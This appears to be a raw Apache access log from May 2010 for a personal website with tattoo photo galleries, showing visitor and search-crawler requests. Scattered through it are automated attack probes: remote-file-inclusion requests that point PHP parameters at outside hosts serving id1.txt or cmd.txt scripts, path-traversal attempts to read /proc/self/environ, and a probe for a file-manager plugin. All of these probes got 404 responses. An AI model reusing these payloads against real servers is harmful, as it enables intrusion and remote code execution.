84.249.100.246 - - [08/May/2010:14:33:19 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:19 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:19 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:20 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:20 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:28 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:28 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:28 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:28 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:28 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:28 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:28 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:29 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:29 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:29 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:29 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:38 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:44 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
207.46.12.75 - - [08/May/2010:14:36:12 -0500] "GET /artwork/artmaster.htm HTTP/1.1" 200 886 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)"
87.250.255.243 - - [08/May/2010:14:37:37 -0500] "GET /logs/access_log.1225670400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:14:43:45 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.233 - - [08/May/2010:14:46:20 -0500] "GET /logs/access_log.1232755200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:14:49:10 -0500] "GET /logs/access_log.1251417600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.198 - - [08/May/2010:14:50:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [08/May/2010:14:53:10 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:14:53:10 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:14:53:10 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.189.224.16 - - [08/May/2010:14:54:39 -0500] "GET /includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.189.224.16 - - [08/May/2010:14:54:39 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
222.236.47.182 - - [08/May/2010:14:55:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:14:55:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:14:55:23 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
67.195.112.180 - - [08/May/2010:14:57:57 -0500] "GET /logs/access_log.1173916800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:14:58:19 -0500] "GET /logs/access_log.1170720000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [08/May/2010:15:03:03 -0500] "GET /logs/access_log.1239580800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [08/May/2010:15:04:03 -0500] "GET /logs/access_log.1240704000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:15:04:23 -0500] "GET /logs/access_log.1187827200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
77.66.214.80 - - [08/May/2010:15:05:56 -0500] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 349 "tomdolan.pconline.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
87.250.255.243 - - [08/May/2010:15:12:30 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.224 - - [08/May/2010:15:17:50 -0500] "GET /logs/access_log.1183593600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:15:17:50 -0500] "GET /logs/access_log.1240099200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [08/May/2010:15:18:45 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:15:22:56 -0500] "GET /logs/access_log.1269907200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.163.170.74 - - [08/May/2010:15:26:52 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:15:26:52 -0500] "GET //SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
69.163.170.74 - - [08/May/2010:15:26:52 -0500] "GET /logs//SSI.php?sourcedir=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:15:29:03 -0500] "GET /logs/access_log.1214524800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.189.224.16 - - [08/May/2010:15:30:40 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
213.189.224.16 - - [08/May/2010:15:30:40 -0500] "GET /includes/class_item.php?fileExtension=http://www.pe101aspen.com/admin/FCKeditor/editor/images/smiley/fun/2?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.250.255.243 - - [08/May/2010:15:34:12 -0500] "GET /logs/access_log.1251072000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:15:39:19 -0500] "GET /logs/access_log.1235174400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:15:45:27 -0500] "GET /logs/access_log.1244332800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
79.3.136.94 - - [08/May/2010:15:48:16 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.it/search?q=tattoo%20vintage&hl=it&gbv=2&ndsp=20&ie=UTF-8&sa=N&tab=iw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:16 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:20 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:20 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:21 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
79.3.136.94 - - [08/May/2010:15:48:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET /logs/access_log.1271462400//index.php?option=com_dwgraphs&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET //index.php?option=com_dwgraphs&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET /logs/access_log.1271462400//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET /logs/access_log.1271462400//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET /logs/access_log.1271462400/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
209.239.114.229 - - [08/May/2010:15:49:27 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
